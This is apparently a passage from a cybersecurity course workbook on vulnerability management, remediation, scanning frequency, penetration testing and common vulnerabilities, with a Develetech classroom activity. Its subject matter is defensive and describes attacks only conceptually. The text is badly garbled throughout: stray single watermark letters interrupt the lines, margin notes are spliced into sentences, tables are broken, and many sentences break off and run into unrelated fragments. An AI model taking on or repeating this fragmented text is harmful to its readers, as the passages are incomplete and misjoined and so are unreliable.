e
Plans of Action
at
Plans of Action In both vulnerability management and auditing, it's a good idea to have a plan in place for
addressing issues found during the assessment. This will ensure that you aren't scrambling to figure
lic
out what to do in an emergency. As you develop a plan of action, consider the following key
components:
• Review the assessment results. The plan of action should guide how regularly you review the
up
• Identify appropriate remediation actions. Obviously, you need to figure out what the best
courses of action are to address the issues you discovered. It's not feasible to apply every possible
ot
fix to every issue, so you'll likely need to conduct a cost–benefit analysis to determine the most
appropriate fixes.
• Specify success criteria. The plan should define what success means as far as taking action to
N
address issues. For example, does success mean the risk of a vulnerability is mitigated entirely or
is avoiding the risk enough?
• Determine monitoring procedures. The plan also needs to account for how to monitor any
o
remediation actions you take to ensure they are working as intended. You might soon follow up
with another assessment to see if the vulnerability is still present, for example.
D
POA&M
The DoD supports a similar concept known as a plan of action and milestones (POA&M). As
defined in NIST SP 800-37r2, POA&M is about identifying risk mitigation tasks and the resources
needed to accomplish those tasks. It also outlines milestones in meeting these tasks, as well as
schedules for those milestones. Likewise, the POA&M anticipates any risk mitigation tasks that
cannot be implemented immediately due to several factors, such as the necessary resources for the
task being unavailable.
Remediation
Reports generated by a vulnerability assessment may offer suggestions as to how to fix any detected Remediation
security issues. Even if they don't, you'll likely need to put any vulnerabilities through the process of
remediation. Remediation is not just a simple process of applying a quick fix; it's a comprehensive
approach to managing the risk that vulnerabilities present to the organization. Ultimately, the goal of
e
remediation is to move the organization as close as possible to reaching a level of acceptable risk for
ut
a given situation.
One of the most important preliminary steps in the remediation process is to prioritize your efforts.
There are several factors that can affect which problems you choose to tackle and in what order,
ib
including how critical the affected system or information is, and how difficult it is to implement the
remediation. Having a plan for prioritization will enable you to focus on the most important targets,
tr
and consequently reduce risk as much as possible.
Other than prioritization, another important step in the remediation process is planning for change
is
control implementation. A change control system may already be in place to manage how changes
are applied, whether security related or otherwise. You need to ensure you communicate your
remediation efforts with personnel who oversee change control so the process goes smoothly. In
D
some cases, you may need to demonstrate your suggested changes will have a minimal impact on
operations and will actually fix what they claim to. By conducting sandbox tests on your suggested
changes, the organization can be more confident about pushing this remediation to production
systems.
Validation
or
e
After you've implemented your remediation techniques, you need a way to validate the intended
actions were taken and had the intended effect. Regular audits you or an external party conducts will
at
typically catch any gaps in your remediation. However, it may be too late by the time this happens,
and any issues with your remediation efforts may go undetected and uncorrected for longer than
lic
you can tolerate. That's why you should consider incorporating a validation phase at the end of your
remediation process—so you can quickly guarantee a particular vulnerability has been fixed and is
not continuing to bring risk to the organization.
up
Remediation Inhibitors
You should be aware there are plenty of inhibitors to the remediation process. These obstacles can Remediation Inhibitors
D
undermine your ability to deal with vulnerabilities in the most ideal way possible, and in some cases,
may make it impossible to remediate the problem. For example:
ot
• The suggested remediation method may lead to a necessary business process interruption. In
some cases, this type of interruption is deemed too much of a risk to the business's operations.
Or, the interruption is at least enough of a risk that the remediation, if successful, is not worth
N
implementing.
• The remediation may lead to a degradation of functionality in a particular component. This is
often the case with systems flawed by design—those that failed to incorporate security as a
o
fundamental element of the design process. These systems may not be able to operate as desired
if security restrictions are placed on them.
D
• Organizational governance may make it difficult for security personnel to implement remediation
if higher-level decision makers do not sign off on the fixes. They may not understand the
importance of remediating the affected component or they may decide that the suggested
remediation is not worth the time and expense.
• The suggested remediation may be too resource intensive, or may require resources beyond the
organization's reach. There are many other resource-related implications brought about by your
remediation efforts that you need to identify, though you won't always be able to overcome these
challenges.
• Business documents like memoranda of understanding (MOU) and service-level agreements
(SLA) can limit the security team's ability to remediate vulnerabilities. General consumers and
business customers expect a certain level of functionality in the products they purchase, and if
the organization implements a fix that negatively impacts this functionality, the organization
could be in violation of an SLA, MOU, or other such agreement.
e
ut
Vulnerability Each step of the vulnerability management process, as well as the findings and outcomes that come
Management from each step, should be documented. This means recording each asset identified as part of the
Documentation inventory process; recording any vulnerabilities that are found; recording remediation techniques,
ib
and so on. All of these things must be documented during each relevant step, not later or at the very
end of the process. That way, you can ensure you don't miss or forget to document some important
aspect of the environments under review.
tr
In addition to documenting remediation techniques, you should also be prepared to document
is
exceptions. In some cases, an assessment may reveal a vulnerability that, for various reasons (like
those mentioned previously), you've decided not to remediate. For example, you might have a legacy
system that cannot function without some service that, on modern systems, would bring about
D
unacceptable risk. By documenting exceptions like these, you ensure that your remediation efforts
don't end up causing more problems than they solve.
or
To keep sensitive information from falling into unauthorized hands, you must take care to secure
your documentation at all times. This means not storing a digital form of the documentation on a
public repository or a private network share that is exposed to all personnel in an organization. In
some cases, you may want to encrypt the documentation and implement digital signatures to uphold
e
its confidentiality and integrity.
at
Ongoing Scanning
lic
Ongoing Scanning Vulnerability management is not a linear process, but a cyclical one. The ever-changing threat and
technological landscape enables attackers to develop novel ways of compromising an organization.
That's why your vulnerability management program needs to conduct regular, ongoing scans as part
up
Whereas some techniques have a negligible impact on performance, others may add significant
overhead to computing and network resources.
ot
Scanning Frequency
N
Scanning Frequency You need to consider multiple factors when it comes to choosing a scanning frequency. Just like
with requirements identification, the laws and regulations your organization is subject to may be
critical drivers. Some sources of external compliance may outright dictate a scanning frequency that
o
your organization must follow; others take a more hands-off approach and simply require that you
have a plan in place to scan at certain intervals. Likewise, your scanning frequency will depend on
D
internal risk-based compliance. If you determine you have a large risk appetite for a certain system
or function of the business, you may choose to scan less frequently, and vice versa.
Your workflow may be another factor that affects your scanning frequency. For example, running a
simple port scan on a small number of hosts in your environment may take just a few minutes and
won't be too taxing—therefore, you may want to run such a scan at least once a day, preferably
when the hosts are not being used during business hours. On the other hand, a deep and thorough
vulnerability scan of all hardware and software objects could take several hours and be a drain on
resources, so you may want to run this scan once a week or once a month on the weekends.
Another driver of scanning frequency is the rate at which changes are made to the systems within
the assessment scope. If a system is patched or reconfigured often, the standard scanning frequency
may not be sufficient. You may need to scan said systems more often to keep up with the rate at
which vulnerabilities accumulate.
e
Use the following guidelines when implementing a vulnerability management plan. Guidelines for
ut
Implementing a
Implement a Vulnerability Management Plan Vulnerability
Management Plan
ib
When implementing a vulnerability management plan:
• Take inventory of all assets in the organization, including both hardware and software assets.
• Consider how regulatory requirements may drive your vulnerability assessments.
tr
• Consider how policies, like data classification, may inform what assets you assess and how you
assess them.
is
• Ensure that you can answer various questions about assessment execution, such as who will carry
out the assessment and when.
D
• Ensure that your assessment tools are generating actionable reports.
• Consider how you will distribute these reports to the proper stakeholders.
or
• Establish a remediation process for addressing vulnerabilities found during assessments.
• Prioritize remediation efforts to tackle the most critical vulnerabilities or assets.
• Plan remediation efforts around change control processes.
• Consider there are several factors that could inhibit your remediation efforts, like the risk of
e
service interruption.
at
ACTIVITY 6-2
Implementing a Vulnerability Management Plan
Activity: Implementing a
Vulnerability Before You Begin
e
Management Plan
You'll use your Windows 10 computer in this activity.
ut
Scenario
Up until now, Develetech has been addressing vulnerabilities reactively—every time a major security
ib
alert is issued by an external source, the organization scans a few of its systems for flaws. However,
you know this kind of approach is not sufficient if the organization wants to truly mitigate risk. You
tr
suggest that your team develop a comprehensive vulnerability management plan so that Develetech
is more proactive about fixing its security issues.
is
® ®
1. On your Microsoft Windows 10 computer, open a web browser and
D
navigate to https://www.pcisecuritystandards.org/documents/
PCI_DSS_v3-2-1.pdf.
or
Note: If you're redirected to the document library, select the PCI DSS link and
accept the licensing agreement. Select the link again, and if you're prompted to
fill out a form, select No Thanks.
e
Navigate to page 96 ("Requirement 11: Regularly test security systems and
at
2.
processes").
lic
3. This section of the PCI DSS outlines requirements for vulnerability scans.
According to these requirements, what are some of the behaviors that
up
environments at least once every three months; the organization must run a vulnerability scan
after a significant change to its network (e.g., its topology changes); the organization must allow
an external vulnerability assessment agency validated by PCI DSS to scan environments every
ot
three months; the organization must have a monitoring process in place for detecting changes to
critical files; and more.
N
o
D
4. Develetech has a small division within the company that provides cloud-based
virtual server usage to customers in an Infrastructure as a Service (IaaS)
platform. Develetech signs off on an SLA for each customer, promising that it
will deliver 99.99% uptime with limited latency. In order to keep these virtual
systems secure, you run vulnerability assessments on them periodically. The
latest scan reveals a major vulnerability that will require a quick security patch
to fix.
e
How could the nature of this cloud platform business inhibit Develetech from
remediating this problem?
ut
A: Answers may vary, but Develetech needs to consider the impact of putting the security patch in
place. If the company simply propagates the fix to all production environments at once, there will
ib
likely be processing and networking bottlenecks that cause delays or may even lead to a
disruption of service. If this is in direct violation of the SLA, Develetech may be subject to legal
action. The vulnerability management plan needs to account for the impacts of remediation with
tr
regard to the company's various business arrangements.
is
5. You want to run a thorough and comprehensive vulnerability scan of all critical
production systems once a week, and a quicker port scan of those same
D
systems every other day.
What factors influence your decision to conduct these two scans at different
frequencies?
or
A: Answers may vary. The comprehensive vulnerability scan is likely to be a bigger drain on network
and computing resources, so it wouldn't necessarily be feasible to conduct this scan every day.
On the other hand, the port scan is less disruptive, so it makes more sense to conduct it more
e
frequently. Time is also a factor—the comprehensive scan could take several hours, or even days,
at
while the port scan may take just a few minutes. Another factor to consider is employee workflow.
Starting the comprehensive scan in the middle of a weekday is not the best choice, as the chance
of interrupting business is at its highest. Performing either scan after business hours or on the
lic
TOPIC C
Assess Vulnerabilities
Now that you've established a plan for managing vulnerabilities, you can start assessing those
vulnerabilities directly.
e
Vulnerability Assessment
ut
Vulnerability A vulnerability assessment is an evaluation of a system's security and ability to meet compliance
Assessment requirements based on the configuration state of the system, as represented by information collected
ib
from the system.
Essentially, the vulnerability assessment determines if the current configuration matches the ideal
tr
configuration. Before beginning the assessment process in earnest, you should first establish the
scope of the assessment so that it supports your compliance requirements without exceeding them.
is
The process consists of the following steps:
1. Collect a predetermined set of target attributes (such as specific parameters or rules for a
D
firewall).
2. Store the collected sample for reference.
3. Organize the data to prepare it for analysis and comparison.
Although this process could be conducted manually, vulnerability assessments are typically
e
accomplished through automated vulnerability assessment tools, which examine an organization's
systems, applications, and devices to determine their current state of operation and the effectiveness
at
of any security controls. Typical results from a vulnerability assessment will identify
misconfigurations and missing security patches or critical updates.
lic
• New vulnerabilities have been identified through penetration tests, or based on general
information from vendors, a vulnerabilities database, or other sources. A vulnerability assessment
can reveal systems that are subject to the vulnerabilities and where you need to focus your
remediation efforts.
D
• A security breach occurs, as the vulnerability assessment can help you identify possible attack
vectors and determine whether they have been exploited.
ot
• You need to document the security state of systems. For example, you may be required to
do this to satisfy a regulatory audit or other oversight requirements.
N
Penetration Testing
A penetration test, or pen test, uses active tools and security utilities to evaluate security by
o
Penetration Testing
Penetration testing is executing an authorized attack on a system. A penetration test will verify a threat exists, then it will
D
introduced here so actively test and bypass security controls, and finally it will exploit vulnerabilities on the system. Such
students understand vulnerabilities may be the result of poorly or improperly configured systems, known or unknown
how vulnerability hardware or software flaws, or operational weaknesses in processes or technical countermeasures.
assessments are Any security issues found in the test that can be exploited are presented to the organization with an
different. assessment of the impact and a remediation proposal.
Penetration tests are less common and more intrusive than basic vulnerability assessments.
Penetration tests tend to be driven by an organization's desire to determine the feasibility of an
attack and the amount of business impact a successful exploitation of vulnerabilities will have on an
organization. One major difference between penetration testing and typical vulnerability assessments
is that the rating assigned to a vulnerability during a vulnerability assessment is subjective, whereas a
penetration test will exploit a real vulnerability to test it. Penetration testing also tends to combine
multiple vulnerabilities together to provide a more holistic understanding of an organization's
vulnerability state.
It is important that penetration testing follows a method similar to what a real attacker would use, Consider asking
including phases in which the attacker prepares and learns what they can about the target. The students if they have any
experience with a
difference between the execution of a real attack and a penetration test is that of intent, and you
e
penetration test causing
should have the explicit permission of the target organization before you begin the test. You should real-world damage.
ut
make sure the organization is aware the test should not stop until the attack has been fully carried
out. Otherwise, the results of the test could be skewed or the live systems themselves may be
damaged.
ib
Vulnerability Assessment vs. Penetration Testing
tr
Vulnerability assessment and penetration testing are related in that both are used to assess systems in Vulnerability
light of the organization's security posture, but they have different purposes. Unfortunately, the Assessment vs.
is
terms are often confused. For example, you may hear someone use the term "penetration test" to Penetration Testing
describe a vulnerability assessment. In any conversation where the distinction matters, you might ask
D
the person to clarify what they mean.
The following table compares a vulnerability assessment with a penetration test.
Attribute of the
Process
Focus
Vulnerability
Assessment
Specific known
or
Penetration Testing
control using scanning tools. tools, but driven in part by human intuition,
which is difficult to simulate or automate.
Disruption to system Minimal, since most of Potentially significant, since exploits such as
D
operations the focus is on data distributed denial of service (DDoS) attacks may
collection. be conducted.
Frequency and Performed frequently Expensive, time consuming, and potentially
ot
frequent scans.
1. Install the assessment software on the systems per the implementation plan. If necessary, run
suitable patches to ensure the latest version of the tool is implemented.
2. Study the assessment software's help manual. Enable options that will keep the software
automatically updated. Register the software to receive its full benefits.
3. Perform an initial assessment of the system.
4. Save the initial assessment results as the baseline.
5. Analyze the assessment reports.
6. Take suitable corrective actions based on the reported findings.
e
7. Perform the assessment again.
8. Save the results and compare them with the baseline assessment results.
ut
9. Document your findings and prepare suitable reports to present to upper management.
10. Perform ongoing assessments on all systems in your organization.
ib
Tools Used in Vulnerability Assessment
tr
Tools Used in Many software tools support vulnerability assessments. You can find tools to detect a wide range of
Vulnerability vulnerabilities and specific hard-to-detect vulnerabilities. By running these tools, you can see exactly
is
Assessment (2 Slides) what potential attackers would see if they assessed your systems. However, their usefulness to you is
dependent on how well you can interpret the results of security assessment tools. When you become
D
acquainted with what to expect and what to look out for in a tool's results, it will be easier for you to
remove any vulnerabilities in your system.
The following table lists some of the available vulnerability assessment tools.
Vulnerability
Assessment Tool
Description or
e
Vulnerability scanner Identifies and reports on known weaknesses found in devices,
applications, and systems residing on a network. A vulnerability scanner
at
reachable (alive), what ports on these devices are active, and what
protocols these active ports use to communicate. A port scanner typically
relies on the most common network protocols (for example,
Transmission Control Protocol [TCP], User Datagram Protocol [UDP],
D
Vulnerability Description
Assessment Tool
Network enumerator Gathers information on users, groups, and services on a network without
authenticating to the device. Network enumerators often use protocols
like ICMP and Simple Network Management Protocol (SNMP) to
discover network hosts and retrieve the information.
Password cracker Used to recover secret passwords from data stored or transmitted by a
computer.
e
Fuzzer Sends an application random input data to see if it will crash or expose a
ut
vulnerability. These tools can be useful in detecting any faults that will
expose sensitive information in an application, and especially in web apps.
ib
HTTP interceptor An application or device used to read HTTP communications or web
traffic.
tr
Exploitation Provides a consistent and reliable environment to create and execute
framework exploit code against a target.
is
Intelligence gatherer Gathers information regarding a target organization before actually
conducting the attack for the purpose of discovering key information and
D
vulnerabilities without being detected. Methods include taking advantage
of people exposing too much on social media sites, using the Whois
domain lookup to retrieve Internet registration information, and mapping
Port Scanning
a network's topology.
or
e
ICMP is typically used by a port scanner to perform the preliminary check to determine what Port Scanning
at
devices on the network are alive and responding before a real port scan is carried out. This is done
for optimization reasons, as a full port scan of all 65,535 ports for both the UDP and TCP protocols
can be time consuming. By checking if the device is alive and responding using ICMP discovery, you
lic
can reduce the overall length of time it takes to port scan a large network. Take caution when using
this default setting, as devices can be configured to not respond to ICMP echo requests and will be
skipped by the port scanner.
up
D
ot
N
o
D
Fingerprinting
Fingerprinting Fingerprinting is the technique of determining the type of operating system and services a target
uses by studying the types of packets and the characteristics of these packets during a
communication session. Fingerprinting typically relies on TCP/IP to provide this information.
There are two types of fingerprinting: active fingerprinting and passive fingerprinting.
Active fingerprinting is performed with a scanning tool that sends specifically crafted packets and
examines their responses to determine the operating system version and service-related information.
For example, an assessor may simply establish a Telnet session or create a socket connection to an
e
open port to observe the response. Web servers and mail servers are notorious for responding with
ut
operating system and application version information in the initial response header.
Passive fingerprinting attempts to learn more about a targeted service without the target knowing it.
Passive fingerprinting is a form of packet sniffing, in that the packets are captured during normal
ib
communications with the service and then are examined for specific characteristics and oddities.
Every operating system's IP stack has its own idiosyncrasies, and it is up to the IP stack developer to
determine how certain protocol communications are handled and set.
tr
is
Networking Vulnerabilities
Networking The following is a list of some common vulnerabilities in network infrastructure and appliances:
D
Vulnerabilities • Lack of network segmentation: A network infrastructure that isn't divided into subnets may
The following end up being a single point of compromise for an attacker's benefit. If the attacker breaches the
vulnerability lists are not
exhaustive; they merely
point out a few common
examples.
or
network, they may have access to all nodes, rather than just the nodes in their segment. Poorly
segmented networks also present a problem when the incident response team tries to contain
worms and other fast-spreading malware.
• Insufficient security of interconnected networks: Some organizations or divisions within an
e
organization run networks that are independent, yet offer some measure of integration. Even if
one network has robust security, it can still be contaminated by the other network if the other
at
network is insecure.
• Insecure authentication used in virtual private networks (VPNs): Some VPNs include the
lic
• Poorly configured endpoints: Since endpoints are the gatekeepers of your network, an attacker
who is able to breach their defenses can find a way into the network. Endpoint vulnerabilities
tend to result from weak or non-existent anti-malware solutions and insufficient access control.
• Sensitive data transmitted across the network in plaintext: If an attacker gains access to the
D
network, they may be able to sniff traffic on their network segment and inspect each packet for
useful data. This process is much more lucrative to an attacker when no transport encryption
method is active.
ot
• Poorly secured network appliances: Switches can be overloaded in a DoS attack if they fail to
incorporate loop protection and flood guards. Routers may fail to drop network packets from
N
spoofed or unknown sources if not configured properly. Firewalls may not adequately filter
inbound traffic if they are not adhering to the principle of implicit deny. All of these and other
access points may be placed incorrectly within the logical or physical topology of the network,
o
management consoles that are still configured with default credentials can be breached by an
attacker with access to the signal. Even if the management console is secured, certain wireless
communication protocols are obsolete and easily cracked, namely Wired Equivalent Privacy
(WEP) and Wi-Fi Protected Setup (WPS).
• Flaws in network infrastructure and services: Vulnerabilities in network services like digital
subscriber line (DSL) can impact your infrastructure. For example, certain DSL modems have
been shown to be vulnerable to command injection and information leakage exploits that enable
attackers to take over the modem for use in a botnet. IP addressing is also a potential flaw in the
network infrastructure if IP address management (IPAM) techniques are not properly
implemented, or if there are conflicts between IPv6 traffic on IPv4-only networks, and vice
versa.
• Insufficient monitoring and alerting capabilities: Without event monitors positioned at key
points within the network, attempted or successful attacks will go unnoticed by the organization.
Alerts without context can also confuse security analysts and make it difficult for them to
identify the problem and take action.
e
Host Vulnerabilities
ut
The following is a list of some common vulnerabilities in hosts and the operating systems they run: Host Vulnerabilities
• Unnecessary services running on servers: Because servers are such important devices in any
ib
organizational environment, they are some of the most common targets of attacks. A server with
too many running services will increase its attack surface, and subsequently, its risk of
tr
compromise.
• Misconfigured access control mechanisms: Default passwords, active guest accounts, active
is
accounts from former employees, and poorly managed privileges can easily lead to an attacker
gaining access to a device. Additionally, access control mechanisms that don't follow an
organization's policy may fail to secure business objectives and either be too restrictive to
D
authorized entities or too permissive to unauthorized entities.
• Changes to the system: Most systems need to change in some way, whether it's adding
software, changing system configuration, storing data, and so on. If these changes are not tracked
vulnerable. or
and managed, it will be more difficult to detect ways in which they can leave the system
• Weak at-rest encryption: Sensitive information must be kept confidential, which almost always
e
requires some sort of encryption. If devices use obsolete encryption algorithms and schemes, like
Data Encryption Standard (DES) for symmetrically encrypting data, then the confidentiality
at
phenomenon in your organization, employees' mobile devices may pose a serious risk to the rest
of your network and systems. You have little to no control over employees' personal devices
outside the organization, which means you can't prevent these devices from being compromised,
which then introduces threats to your environment.
up
• Lack of effective anti-malware tools: While common anti-malware solutions are far from
perfect, they are still effective at detecting and removing many strains of malware. Administrators
and users often fail to install these solutions on their devices or they fail to enable real-time
D
scanning features.
• Unpatched operating systems: Without a plan for issuing security fixes to affected systems,
those systems will remain vulnerable to a variety of potential threats.
ot
• Poor physical security: No amount of hardening will keep a device secure if someone can just
walk into an office and steal it. Attackers may also be able to damage or tamper with devices if
they aren't properly locked up and behind layers of physical access control.
N
IoT Vulnerabilities
o
Internet of Things (IoT) devices are vulnerable to much the same types of attacks as other
computing devices. However, it tends to be easier to exploit these vulnerabilities because of how
D
insecure many such devices are by design and operation. For example, many IoT devices don't force
the user to change the default access credentials, and in some cases, hard-code those credentials so
they cannot be changed. Because they are connected to the Internet, these devices are easily
discoverable online and are attractive targets to attackers. Likewise, IoT devices are limited in
processing power and may be unable to incorporate security functionality like encryption that
consumes a significant amount of resources.
Note: An easy way to discover insecure IoT devices is to use Shodan (https://
www.shodan.io/), a search engine that crawls the Internet for connected devices such as IP
cameras, network appliances, industrial control systems, and more.
Application Vulnerabilities
Application The following is a list of some common vulnerabilities in applications:
Vulnerabilities • Improper input handling: Poorly handled input in applications can lead to unauthorized users
e
gaining access to a system or additional privileges. In other cases, the input may disrupt the
ut
system and cause a denial of service.
• Improper error handling: Applications may reveal too much information about how the app
functions in error messages, which can help an attacker with their reconnaissance efforts. Errors
ib
also become a security issue when the app can't handle them gracefully, i.e., the app ends up
consuming too many system resources and becomes unstable.
tr
• Weak cryptographic implementations: Like with operating systems, an application that uses
weak ciphers or weak implementations of cryptography will put the sensitive data it works with
at risk. For example, an app that uses the Message Digest 5 (MD5) algorithm to hash passwords
is
is insecure.
• Memory vulnerabilities: There are many memory-based vulnerabilities, such as memory leaks
D
and buffer overflows. Most such vulnerabilities lead to system instability, and some can even
enable an attacker to inject malicious code into an area in memory to gain control of a system or
read sensitive data.
or
• Flaws in network management software: Networking software is meant to streamline and
optimize network operations and management, but flaws in these tools can have the opposite
effect on the network as a whole. For instance, a network management platform that doesn't
integrate properly with your unique environment can lead to network delays and bandwidth
e
issues, and may even violate security policy.
at
• Misconfigured rules for firewalls, intrusion detection systems (IDSs), and other network
security applications: Many such applications have a default rule set that can shape traffic to
some degree, but this is rarely adequate. A rule set that fails to incorporate the organization's
lic
security policies will be unable to do its part in mitigating risk. Misconfigured rules can be both
too restrictive and too lax—the former may interrupt availability, and the latter may enable an
attacker to slip past its defenses.
up
• Poorly secured configuration files: In addition to configurations themselves being flawed, the
files they are stored in can also be weak against unauthorized reading and modification. If these
files aren't properly protected through encryption and access control, an attacker can more easily
D
databases that interface with the web is SQL injection. By injecting malicious SQL statements in
a web query or form, an attacker can dump the contents or delete entire tables in a database.
N
Virtual Infrastructure The following is a list of some common vulnerabilities in virtualized hosts and networks:
Vulnerabilities • Misconfigured virtual machine (VM) hosts and guest images: When VMs are poorly
D
configured for security, they're exposed to many of the same issues as a physical machine. The
difference is that VMs are designed to be quickly replicated and provisioned over many instances
—a misconfiguration in just one base image will propagate throughout your infrastructure,
resulting in a much larger impact.
• Insecure virtual network appliances: The security capabilities of virtual networking appliances
may differ between vendors or configurations. For example, virtual switches in certain modes
may not behave fully like physical switches—they may fail to isolate traffic between hosts within
a virtual network. An attacker inside one VM may be able to sniff all traffic from another VM on
the same virtual switch.
• Improperly secured management interface: If an attacker gains unauthorized access to the
VM's management interface, they can essentially take full control of all attached virtual systems.
The management interface may be on the physical host that runs the VMs, or it may be a
centralized platform that oversees VMs from multiple physical hosts. In either case, it is
vulnerable to compromise.
• Improper management of physical resources: VMs and networks rely on their physical hosts
for processing. If more resources are provisioned to VMs than their physical hosts can handle,
e
the virtual infrastructure will suffer disruptions. This directly impacts the availability of systems
used by customers and internal personnel alike.
ut
• Insecure VM hypervisors: Attackers inside a VM can escape from that VM through flaws in its
hypervisor. This can enable attackers to access the host hardware and have total control over any
ib
virtual environment running on that host.
• Poor change control and patch management processes: If a security fix needs to be applied
to a physical host, especially a fix updating the hypervisor, this can cause disruptions for the
tr
virtual environments it runs. In addition, the virtual instances themselves will need to be patched
from time to time—if no process is in place to manage these changes, it can be difficult to ensure
is
that all instances receive the fix as quickly as possible with minimal interruption.
• Lost system logs: VM instances are most useful when they are elastic, meaning they are
D
optimized to spin up when needed, and then power down when not. This process of constant
provisioning and deprovisioning means any logs stored on the instances themselves may be lost.
This makes the tasks of analyzing user and system behavior and performing after-incident
forensics much more difficult for security personnel.
Vulnerability Scans
or
e
When a company tests a computer system or network, it is generally testing a production network Vulnerability Scans
at
that is live. Security tests are rarely conducted on offline or test networks. A vulnerability scan uses Consider having
various tools and security utilities to identify and quantify vulnerabilities within a system, such as students start keying the
lacking security controls and common misconfigurations, but does not directly test the security activity first, and then
lic
• Active scanning: Looking directly at a device's configuration, for example. in class. Also consider
running the scan on your
• Passive assessment: Analyzing indirect evidence resulting from a certain configuration, such as
computer beforehand so
the types of traffic generated by a device or their behavior, for example. students can see results
• Through agents installed on the system or through server-based scanning mechanisms.
D
right away.
Vulnerability scanners can be configured to collect information in different ways based on the
criteria you provide. For example, you may wish to widen the scope of a scan to see more potential
ot
issues, or narrow the scope to quickly identify problems you already suspect are present. You can
also configure scanning tools to scan only certain types of data or only data that meets a specific
sensitivity level as classified by the organization. By default, most scanning tools are hooked into the
N
vendor's vulnerability feed or some other common vulnerability database. If you've determined your
own scanning criteria, you may be able to change the feed the tool uses, which can alter what the
scan actually detects.
o
Vulnerability scans may be credentialed in that they implement credentials to ascertain vulnerabilities
at the highest privilege levels. Or, they may be non-credentialed, meaning they run without
credentials to see what a hacker would see at a lower level. Although you may discover more
weaknesses with a credentialed scan, you sometimes will want to narrow your focus to think like an
attacker who doesn't have specific high-level permissions or total administrative access. This can
also save you time and resources, both of which may be more costly in a credentialed scan.
SCAP
Many popular vulnerability scanners are validated with respect to the Security Content
Automation Protocol (SCAP), a framework developed by the National Institute of Standards and
Technology (NIST) that automates the vulnerability management process, including identifying
flaws in security configurations. A SCAP-validated tool adheres to standards for scanning processes,
results reporting and scoring, and vulnerability prioritization. SCAP is commonly used to uphold
internal and external compliance requirements. Some tools that are not officially SCAP-validated
have plug-ins that can still export scan data to a SCAP-compliant format.
e
Specific Vulnerability Scanning Tools
ut
Specific Vulnerability Many vulnerability scanning tools are available commercially. Some are considered "targeted"
Scanning Tools vulnerability scanners in that they are intended to scan specific platforms or discover specific types
ib
of vulnerabilities. Others are general vulnerability scanners that apply to many platforms and look
for a broad set of flaws.
tr
• Tenable Nessus® is a comprehensive vulnerability scanner that provides high-speed discovery,
configuration auditing, asset profiling, sensitive data discovery, and vulnerability analysis.
is
Although free of charge for personal use in a non-enterprise environment, enterprise
organizations must purchase a subscription to use Nessus. For more information, see https://
www.tenable.com.
D
• The System Administrator's Integrated Network Tool (SAINT®) vulnerability scanner
screens every live system on a network for TCP and UDP services. For each service it finds
or
running, it launches a set of probes designed to detect anything that could enable an attacker to
gain unauthorized access, create a DoS attack, or gain sensitive information about the network.
For more information, see https://www.carson-saint.com/.
• The Qualys® Vulnerability Management tool is an assessment and scanning suite that
e
provides continuous monitoring services and a cloud-based management platform. It also
integrates compliance requirements into the monitoring and scanning process. For more
at
reports for vulnerabilities on a wide variety of enterprise software and hardware platforms. It also
offers continuous monitoring capabilities. For more information, see https://
www.rapid7.com.
up
• The GFI® LanGuard™ scanner can check networks and ports to detect, assess, and correct
security vulnerabilities, including standard vulnerability issues, patch management, and network
auditing. For more information, see https://www.gfi.com.
Additionally, a number of freeware vulnerability scanning tools are available, including:
D
Vulnerability Tests (NVTs) to identify and categorize the latest known vulnerabilities. It was
previously known as OpenVAS. For more information, see https://www.greenbone.net/en/.
• Nikto2 is an open source tool that targets web server vulnerabilities. It quickly scans a server for
N
known malware, common security misconfigurations, and outdated software. For more
information, see https://cirt.net/Nikto2.
o
ACAS
D
Tenable's Assured Compliance Assessment Solution (ACAS) is a solution that integrates various
vulnerability assessment tools, including Nessus, into a single suite validated by the Defense
Information Systems Agency (DISA), a child agency of the U.S. Department of Defense (DoD).
ACAS enables the DoD and its customers to meet the strict DISA compliance standards.
e
environment, nor can they make context-based decisions at the same level as a human analyst. So,
ut
you need to be able to truly understand each vulnerability the scanner presents to you, and then
consider how that vulnerability exists in your environment. This will enable you to see any
discrepancies with the general vulnerability definition and how that definition may manifest in your
ib
systems. For example, a vulnerability scanner may be correct in pointing out that your web server is
missing a critical security patch. But, you may have fixed the security issue through a different
mechanism the scanner isn't detecting—therefore, that vulnerability alert is a false positive.
tr
Another important part of your report analysis skillset is the ability to identify exceptions. In some
cases, you'll have chosen to accept or transfer the risk of a specific vulnerability because it fits within
is
your risk appetite to do so. Nevertheless, the scanner may still produce this vulnerability in its
report. You can therefore mark this particular item as an exception so it won't contribute to your
D
remediation plan. For example, a scanner may tell you that port 80 is open on your web server. This
is certainly a common vector of attack, but the port must remain open so the system can fulfill its
function.
or
Once you've identified the nature of the vulnerability alerts and their validity, you'll need to
determine how to prioritize your response and remediation actions. Using your pre-existing
baselines and risk analysis efforts, you'll be able to decide which vulnerabilities are the most critical
e
versus which are the least critical. Scanner reports often give their best guess by scoring each
vulnerability item, but this typically doesn't take into account the various contextual factors unique
at
to your environment.
lic
learned with other data points in your organization. After all, the success of your risk mitigation
efforts depends heavily on the accuracy of the vulnerability information you've collected. You need
to be able to reconcile the results of a scan with what you know about your environment, as well as
D
what you know about the current security landscape. Not only can this help you validate your
current situation, but you can also use this information to determine vulnerability trends that may
form over time.
ot
Your organization will most likely be driven by a security policy. You can compare the results of a
scan with this policy to determine if a particular vulnerability is in violation of compliance. Likewise,
N
you probably operate under a large set of best practices recommended by the security industry, even
if those best practices aren't necessarily set in policy. By comparing your scan results to these
practices, you can obtain a clearer picture of how a vulnerability does or does not violate a security
o
principle. In either case, comparing results to existing guidelines or policies will help you validate
whether a particular system in your environment is actually susceptible to exploitation.
D
Correlating the scan results with other data sources, like related system and network logs, can also
enhance the validation process. As an example, assume that your vulnerability scanner identified a
running process on a Windows machine. According to the scanner, the application that creates this
process is known to be unstable, causing the operating system to lock up and crash other processes
and services. When you search the computer's event logs, you notice that several entries over the
past couple of weeks indicate the process has failed. Additional entries show a few other processes
fail right after. In this instance, you've used a relevant data source to help confirm the vulnerability
alert is, in fact, valid.
e
When assessing vulnerabilities:
• Decide between a penetration test and a vulnerability assessment based on your business needs.
ut
• Follow an assessment process from collecting data through reporting on results.
• Conduct assessments after certain key events, like an update to critical systems or after a new
ib
vulnerability is discovered.
• Capture baselines of systems before you begin the assessment in earnest.
• Compare future assessments against these baselines.
tr
• Select the proper assessment tool for the job and consider implementing multiple tools to gain a
broader perspective.
is
• Implement port scanning and fingerprinting to identify basic network-related weaknesses in
hosts.
D
• Familiarize yourself with common vulnerabilities in networks, hosts, and applications.
• Configure vulnerability scan characteristics, including scope, data feeds, sensitivity level, and
credentialed vs. non-credentialed, according to business needs.
or
• Familiarize yourself with the different vulnerability scanners available.
